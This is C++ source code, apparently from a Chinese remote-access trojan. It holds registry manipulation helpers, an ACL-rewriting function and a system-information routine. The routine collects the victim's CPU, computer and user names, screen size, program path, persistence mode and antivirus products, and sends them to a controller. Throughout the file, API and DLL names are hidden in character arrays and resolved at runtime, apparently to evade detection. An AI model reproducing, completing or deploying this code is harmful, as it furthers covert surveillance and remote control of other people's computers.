//写注册表的指定键的数据(Mode:0-新建键数据 1-设置键数据 2-删除指定键 3-删除指定键项) int WriteRegEx(HKEY MainKey,LPCTSTR SubKey,LPCTSTR Vname,DWORD Type,char* szData,DWORD dwData,int Mode) { HKEY hKey; DWORD dwDisposition; int iResult =0; __try { // SetKeySecurityEx(MainKey,Subkey,KEY_ALL_ACCESS); typedef LONG (APIENTRY *RegCreateKeyExAT) ( __in HKEY hKey, __in LPCSTR lpSubKey, __reserved DWORD Reserved, __in_opt LPSTR lpClass, __in DWORD dwOptions, __in REGSAM samDesired, __in_opt LPSECURITY_ATTRIBUTES lpSecurityAttributes, __out PHKEY phkResult, __out_opt LPDWORD lpdwDisposition ); char KIoFqQPSy[] = {'A','D','V','A','P','I','3','2','.','d','l','l','\0'}; RegCreateKeyExAT pRegCreateKeyExA= (RegCreateKeyExAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"RegCreateKeyExA"); typedef LONG (APIENTRY *RegOpenKeyExAT)( __in HKEY hKey, __in_opt LPCSTR lpSubKey, __reserved DWORD ulOptions, __in REGSAM samDesired, __out PHKEY phkResult ); RegOpenKeyExAT pRegOpenKeyExA=(RegOpenKeyExAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"RegOpenKeyExA"); typedef LONG (APIENTRY *RegSetValueExAT)( __in HKEY hKey, __in_opt LPCSTR lpValueName, __reserved DWORD Reserved, __in DWORD dwType, __in_bcount_opt(cbData) CONST BYTE* lpData, __in DWORD cbData ); RegSetValueExAT pRegSetValueExA=(RegSetValueExAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"RegSetValueExA"); typedef LONG (APIENTRY *RegDeleteValueAT)( __in HKEY hKey, __in_opt LPCSTR lpValueName ); RegDeleteValueAT pRegDeleteValueA=(RegDeleteValueAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"RegDeleteValueA"); typedef LONG (APIENTRY *RegDeleteKeyAT)( __in HKEY hKey, __in LPCSTR lpSubKey ); RegDeleteKeyAT pRegDeleteKeyA=(RegDeleteKeyAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"RegDeleteKeyA"); typedef int (WINAPI *lstrlenAT)( __in LPCSTR lpString ); lstrlenAT plstrlenA=(lstrlenAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"lstrlenA"); switch(Mode) { case 0: if(pRegCreateKeyExA(MainKey,SubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&hKey,&dwDisposition) != ERROR_SUCCESS) __leave; case 1: if(pRegOpenKeyExA(MainKey,SubKey,0,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS) __leave; switch(Type) { case REG_SZ: case REG_EXPAND_SZ: if(pRegSetValueExA(hKey,Vname,0,Type,(LPBYTE)szData,plstrlenA(szData)+1) == ERROR_SUCCESS) iResult =1; break; case REG_DWORD: if(pRegSetValueExA(hKey,Vname,0,Type,(LPBYTE)&dwData,sizeof(DWORD)) == ERROR_SUCCESS) iResult =1; break; case REG_BINARY: break; } break; case 2: if(pRegOpenKeyExA(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS) __leave; if (pRegDeleteKeyA(hKey,Vname) == ERROR_SUCCESS) iResult =1; break; case 3: if(pRegOpenKeyExA(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&hKey) != ERROR_SUCCESS) __leave; if (pRegDeleteValueA(hKey,Vname) == ERROR_SUCCESS) iResult =1; break; } } __finally { typedef LONG (APIENTRY *RegCloseKeyT) ( __in HKEY hKey); char YWsjU[] = {'R','e','g','C','l','o','s','e','K','e','y','\0'}; char KIoFqQPSy[] = {'A','D','V','A','P','I','3','2','.','d','l','l','\0'}; RegCloseKeyT pRegCloseKey=(RegCloseKeyT)GetProcAddress(LoadLibrary(KIoFqQPSy),YWsjU); pRegCloseKey(MainKey); pRegCloseKey(hKey); } return iResult; }
//读取注册表的指定键的数据(Mode:0-读键值数据 1-牧举子键 2-牧举指定键项 3-判断该键是否存在) int ReadRegEx(HKEY MainKey,LPCTSTR SubKey,LPCTSTR Vname,DWORD Type,char *szData,LPBYTE szBytes,DWORD lbSize,int Mode) { typedef LONG (APIENTRY *RegOpenKeyExAT)( __in HKEY hKey, __in_opt LPCSTR lpSubKey, __reserved DWORD ulOptions, __in REGSAM samDesired, __out PHKEY phkResult ); char KIoFqQPSy[] = {'A','D','V','A','P','I','3','2','.','d','l','l','\0'}; RegOpenKeyExAT pRegOpenKeyExA=(RegOpenKeyExAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"RegOpenKeyExA"); typedef LONG (APIENTRY *RegEnumValueAT)( __in HKEY hKey, __in DWORD dwIndex, __out_ecount_opt(*lpcchValueName) LPSTR lpValueName, __inout LPDWORD lpcchValueName, __reserved LPDWORD lpReserved, __out_opt LPDWORD lpType, __out_bcount_opt(*lpcbData) LPBYTE lpData, __inout_opt LPDWORD lpcbData ); RegEnumValueAT pRegEnumValueA=(RegEnumValueAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"RegEnumValueA"); HKEY hKey; int ValueDWORD,iResult=0; char* PointStr; char KeyName[32],ValueSz[MAX_PATH],ValueTemp[MAX_PATH]; DWORD szSize,KnSize,dwIndex=0; memset(KeyName,0,sizeof(KeyName)); memset(ValueSz,0,sizeof(ValueSz)); memset(ValueTemp,0,sizeof(ValueTemp)); __try { // SetKeySecurityEx(MainKey,SubKey,KEY_ALL_ACCESS); if(pRegOpenKeyExA(MainKey,SubKey,0,KEY_READ,&hKey) != ERROR_SUCCESS) { iResult = -1; __leave; } switch(Mode) { case 0: switch(Type) { case REG_SZ: case REG_EXPAND_SZ: szSize = sizeof(ValueSz); if(pRegQueryValueExA(hKey,Vname,NULL,&Type,(LPBYTE)ValueSz,&szSize) == ERROR_SUCCESS) { strcpy(szData,DelSpace(ValueSz)); iResult =1; } break; case REG_MULTI_SZ: szSize = sizeof(ValueSz); if(pRegQueryValueExA(hKey,Vname,NULL,&Type,(LPBYTE)ValueSz,&szSize) == ERROR_SUCCESS) { for(PointStr = ValueSz; *PointStr; PointStr = strchr(PointStr,0)+1) { strncat(ValueTemp,PointStr,sizeof(ValueTemp)); strncat(ValueTemp," ",sizeof(ValueTemp)); } strcpy(szData,ValueTemp); iResult =1; } break; case REG_DWORD: szSize = sizeof(DWORD); if(pRegQueryValueExA(hKey,Vname,NULL,&Type,(LPBYTE)&ValueDWORD,&szSize ) == ERROR_SUCCESS) { wsprintf(szData,"%d",ValueDWORD); iResult =1; } break; case REG_BINARY: szSize = lbSize; if(pRegQueryValueExA(hKey,Vname,NULL,&Type,szBytes,&szSize) == ERROR_SUCCESS) iResult =1; break; } break; case 1: while(1) { typedef LONG (APIENTRY *RegEnumKeyExAT)( __in HKEY hKey, __in DWORD dwIndex, __out_ecount_opt(*lpcchName) LPSTR lpName, __inout LPDWORD lpcchName, __reserved LPDWORD lpReserved, __inout_ecount_opt(*lpcchClass) LPSTR lpClass, __inout_opt LPDWORD lpcchClass, __out_opt PFILETIME lpftLastWriteTime ); RegEnumKeyExAT pRegEnumKeyExA=(RegEnumKeyExAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"RegEnumKeyExA"); memset(ValueSz,0,sizeof(ValueSz)); szSize = sizeof(ValueSz); if(pRegEnumKeyExA(hKey,dwIndex++,ValueSz,&szSize,NULL,NULL,NULL,NULL) != ERROR_SUCCESS) break; wsprintf(ValueTemp,"[%s]\r\n",ValueSz); strcat(szData,ValueTemp); iResult =1; } break; case 2: while(1) { memset(KeyName,0,sizeof(KeyName)); memset(ValueSz,0,sizeof(ValueSz)); memset(ValueTemp,0,sizeof(ValueTemp)); KnSize = sizeof(KeyName); szSize = sizeof(ValueSz); if(pRegEnumValueA(hKey,dwIndex++,KeyName,&KnSize,NULL,&Type,(LPBYTE)ValueSz,&szSize) != ERROR_SUCCESS) break; switch(Type) { case REG_SZ: wsprintf(ValueTemp,"%-24s %-15s %s \r\n",KeyName,"REG_SZ",ValueSz); break; case REG_EXPAND_SZ: wsprintf(ValueTemp,"%-24s %-15s %s \r\n",KeyName,"REG_EXPAND_SZ",ValueSz); break; case REG_DWORD: wsprintf(ValueTemp,"%-24s %-15s 0x%x(%d) \r\n",KeyName,"REG_DWORD",ValueSz,int(ValueSz)); break; case REG_MULTI_SZ: wsprintf(ValueTemp,"%-24s %-15s \r\n",KeyName,"REG_MULTI_SZ"); break; case REG_BINARY: wsprintf(ValueTemp,"%-24s %-15s \r\n",KeyName,"REG_BINARY"); break; } typedef LPSTR (WINAPI *lstrcatAT)( __inout LPSTR lpString1, __in LPCSTR lpString2 ); lstrcatAT plstrcatA=(lstrcatAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"lstrcatA"); plstrcatA(szData,ValueTemp); iResult =1; } break; case 3: iResult =1; break; } } __finally { typedef LONG (APIENTRY *RegCloseKeyT) ( __in HKEY hKey); char YWsjU[] = {'R','e','g','C','l','o','s','e','K','e','y','\0'}; char KIoFqQPSy[] = {'A','D','V','A','P','I','3','2','.','d','l','l','\0'}; RegCloseKeyT pRegCloseKey=(RegCloseKeyT)GetProcAddress(LoadLibrary(KIoFqQPSy),YWsjU); pRegCloseKey(MainKey); pRegCloseKey(hKey); } return iResult; }
//设置注册表键读取的权限(KEY_READ||KEY_WRITE||KEY_ALL_ACCESS) int SetKeySecurityEx(HKEY MainKey,LPCTSTR SubKey,DWORD security) { typedef __bcount(dwBytes) LPVOID (WINAPI *HeapAllocT) ( __in HANDLE hHeap, __in DWORD dwFlags, __in SIZE_T dwBytes ); HeapAllocT pHeapAlloc = (HeapAllocT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"HeapAlloc"); typedef LONG (APIENTRY *RegCloseKeyT)( __in HKEY hKey ); char YWsjU[] = {'R','e','g','C','l','o','s','e','K','e','y','\0'}; char KIoFqQPSy[] = {'A','D','V','A','P','I','3','2','.','d','l','l','\0'}; RegCloseKeyT pRegCloseKey=(RegCloseKeyT)GetProcAddress(LoadLibrary(KIoFqQPSy),YWsjU); typedef LONG (APIENTRY *RegOpenKeyExAT)( __in HKEY hKey, __in_opt LPCSTR lpSubKey, __reserved DWORD ulOptions, __in REGSAM samDesired, __out PHKEY phkResult ); RegOpenKeyExAT pRegOpenKeyExA=(RegOpenKeyExAT)GetProcAddress(LoadLibrary(KIoFqQPSy),"RegOpenKeyExA"); HKEY hKey; SID_IDENTIFIER_AUTHORITY sia = SECURITY_NT_AUTHORITY; PSID pSystemSid = NULL; PSID pUserSid = NULL; SECURITY_DESCRIPTOR sd; PACL pDacl = NULL; DWORD dwAclSize; int iResult = 0; __try { if(pRegOpenKeyExA(MainKey, SubKey, 0, WRITE_DAC, &hKey)!= ERROR_SUCCESS) __leave; if(!AllocateAndInitializeSid(&sia,1, SECURITY_LOCAL_SYSTEM_RID, 0, 0, 0, 0, 0, 0, 0, &pSystemSid )) __leave; if(!AllocateAndInitializeSid( &sia, 2, SECURITY_BUILTIN_DOMAIN_RID, DOMAIN_ALIAS_RID_ADMINS,0, 0, 0, 0, 0, 0, &pUserSid)) __leave; dwAclSize = sizeof(ACL) + 2 * ( sizeof(ACCESS_ALLOWED_ACE) - sizeof(DWORD) ) + GetLengthSid(pSystemSid) + GetLengthSid(pUserSid) ; pDacl = (PACL)pHeapAlloc(GetProcessHeap(), 0, dwAclSize); if(pDacl == NULL) __leave; if(!InitializeAcl(pDacl, dwAclSize, ACL_REVISION)) __leave; if(!AddAccessAllowedAce( pDacl, ACL_REVISION, KEY_ALL_ACCESS, pSystemSid )) __leave; if(!AddAccessAllowedAce( pDacl, ACL_REVISION, (unsigned long)security, pUserSid )) __leave; if(!InitializeSecurityDescriptor(&sd, SECURITY_DESCRIPTOR_REVISION)) __leave; if(!SetSecurityDescriptorDacl(&sd, TRUE, pDacl, FALSE)) __leave; if(RegSetKeySecurity(hKey, (SECURITY_INFORMATION)DACL_SECURITY_INFORMATION, &sd)!= ERROR_SUCCESS) __leave; iResult =1; } __finally { pRegCloseKey(MainKey); pRegCloseKey(hKey); if(pDacl !=NULL) HeapFree(GetProcessHeap(), 0, pDacl); if(pSystemSid !=NULL) FreeSid(pSystemSid); if(pUserSid !=NULL) FreeSid(pUserSid); } return iResult; }
void CSystemManager::GetSystemInfo() { MESSAGEInfo Infomsg; //获取操作系统相关信息 Infomsg.bToken = TOKEN_SYSTEMINFO; //////////////CPU Speed///////////////// DWORD dwCpu, dwBufLen; HKEY hKey; char JYvni02[] = {'H','A','R','D','W','A','R','E','\\','D','E','S','C','R','I','P','T','I','O','N','\\','S','y','s','t','e','m','\\','C','e','n','t','r','a','l','P','r','o','c','e','s','s','o','r','\\','0','\0'}; char HrFvD07[] = {'R','e','g','O','p','e','n','K','e','y','E','x','A','\0'}; RegOpenKeyExAT pRegOpenKeyExA=(RegOpenKeyExAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),HrFvD07); pRegOpenKeyExA( HKEY_LOCAL_MACHINE, JYvni02, 0, KEY_QUERY_VALUE, &hKey ); dwBufLen = sizeof(DWORD); char HrFvD13[] = {'R','e','g','Q','u','e','r','y','V','a','l','u','e','E','x','A','\0'}; RegQueryValueExAT pRegQueryValueExA=(RegQueryValueExAT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"RegQueryValueExA"); pRegQueryValueExA( hKey, ("~MHz"), NULL, NULL,(LPBYTE)&dwCpu, &dwBufLen); char HrFvD06[] = {'R','e','g','C','l','o','s','e','K','e','y','\0'}; RegCloseKeyT pRegCloseKey=(RegCloseKeyT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),HrFvD06); pRegCloseKey(hKey); char CtxPW50[] = {'w','s','p','r','i','n','t','f','A','\0'}; wsprintfAT pwsprintfA=(wsprintfAT)GetProcAddress(LoadLibrary("USER32.dll"),CtxPW50); pwsprintfA(Infomsg.szCpuSpeend,("~%u MHz"), dwCpu); //Get CPU Info=============================== CHAR SubKey[] = {'H','A','R','D','W','A','R','E','\\','D','E','S','C','R','I','P','T','I','O','N','\\','S','y','s','t','e','m','\\','C','e','n','t','r','a','l','P','r','o','c','e','s','s','o','r','\\','0','\0','\0'}; // CHAR SubKey[MAX_PATH]=("HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0\0"); hKey = NULL; if(pRegOpenKeyExA(HKEY_LOCAL_MACHINE,SubKey,0L,KEY_ALL_ACCESS,&hKey) == ERROR_SUCCESS) { DWORD dwType; DWORD dwSize = 128 * sizeof(TCHAR); pRegQueryValueExA(hKey,("ProcessorNameString"),NULL,&dwType,(BYTE *)Infomsg.szCpuInfo,&dwSize); pRegCloseKey(hKey); } //Get Computer & User Name======================== DWORD dwLen = sizeof(Infomsg.szPcName); char CPolQ16[] = {'G','e','t','C','o','m','p','u','t','e','r','N','a','m','e','A','\0'}; GetComputerNameAT pGetComputerNameA=(GetComputerNameAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),CPolQ16); pGetComputerNameA(Infomsg.szPcName, &dwLen); /* dwLen = sizeof(Infomsg.szUserName); GetUserName(Infomsg.szUserName,&dwLen); //获取当前用户名 */ //获取当前用户名及计算机名称 GetCurrentUserNamet(Infomsg.szUserName); //Get Screen Size================================= char DYrEN67[] = {'G','e','t','S','y','s','t','e','m','M','e','t','r','i','c','s','\0'}; GetSystemMetricsT pGetSystemMetrics=(GetSystemMetricsT)GetProcAddress(LoadLibrary("USER32.dll"),DYrEN67); pwsprintfA(Infomsg.szScrSize, ("%d * %d"), pGetSystemMetrics(SM_CXSCREEN),pGetSystemMetrics(SM_CYSCREEN)); // UINT Porst =dwPort[nConnect]; if(nConnect==0) pwsprintfA(Infomsg.LineName,"域名上线:%s",lpConnects[0]); //域名上线写入 if(nConnect==1) pwsprintfA(Infomsg.LineName,"QQ上线:%s",lpConnects[1]); //QQ上线写入 if(nConnect==2) pwsprintfA(Infomsg.LineName,"网盘上线:%s",lpConnects[2]); //网盘上线写入 pwsprintfA(Infomsg.LinePort,"%d",dwPort[nConnect]); //上线端口写入 char LCoHX03[] = {'G','e','t','M','o','d','u','l','e','F','i','l','e','N','a','m','e','A','\0'}; GetModuleFileNameAT pGetModuleFileNameA=(GetModuleFileNameAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),LCoHX03); char szbuf[256]; pGetModuleFileNameA(NULL,szbuf,MAX_PATH); //用于获取程序本身路径 pwsprintfA(Infomsg.Program,"%s",szbuf ); if(Installope==0) //绿色一次性运行 { pwsprintfA(Infomsg.InstallOpen,"%s","(绿色运行)--重启不上线!"); //上线运行方式 } else if(Installope==1) // 服务启动运行 { pwsprintfA(Infomsg.InstallOpen,"%s","(服务启动)--SYSTEM用户运行!"); //上线运行方式 } else if(Installope==2) // 直接启动运行 { pwsprintfA(Infomsg.InstallOpen,"%s","(直接启动)--当前用户运行!"); //上线运行方式 } pwsprintfA(Infomsg.szUserVirus,"%s",GetVirus()); //杀毒软件 Send((LPBYTE)&Infomsg, sizeof(MESSAGEInfo)); }